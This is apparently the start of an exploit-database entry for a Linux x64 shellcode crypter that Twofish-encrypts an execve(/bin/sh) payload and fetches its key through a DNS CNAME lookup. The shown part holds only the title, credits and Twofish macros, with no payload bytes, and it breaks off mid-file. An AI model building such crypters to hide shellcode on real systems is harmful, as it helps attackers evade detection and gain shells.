Linux/x64 Twofish Encoded + DNS (CNAME) Password + execve(/bin/sh) shellcode.
44a75ebf492559a5b3132e667805500a
/*----- Crypter.c ----- */
/*
Optimized Twofish C implementation by Drew Csillag: https://www.schneier.com/code/twofish-cpy.zip
Partially re-written by Andre Lima (https://andrelima.info) to encrypt/decrypt variable length Linux x86_64 shellcode.
compiler is gcc(egcs-2.91.66)
flags are -O3 -fomit-frame-pointer -Wall
Processor is 233Mhz Pentium II (Deschutes)
OS is Linux 2.2.16
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "tables.h"
#define u32 unsigned int
#define BYTE unsigned char
#define RS_MOD 0x14D
#define RHO 0x01010101L
/*
gcc is smart enough to convert these to roll instructions. If you want
to see for yourself, either do gcc -O3 -S, or change the |'s to +'s and
see how slow things get (you lose about 30-50 clocks) :).
*/
#define ROL(x,n) (((x) << ((n) & 0x1F)) | ((x) >> (32-((n) & 0x1F))))
#define ROR(x,n) (((x) >> ((n) & 0x1F)) | ((x) << (32-((n) & 0x1F))))
#if BIG_ENDIAN == 1
#define BSWAP(x) (((ROR(x,8) & 0xFF00FF00) | (ROL(x,8) & 0x00FF00FF)))
#else
#define BSWAP(x) (x)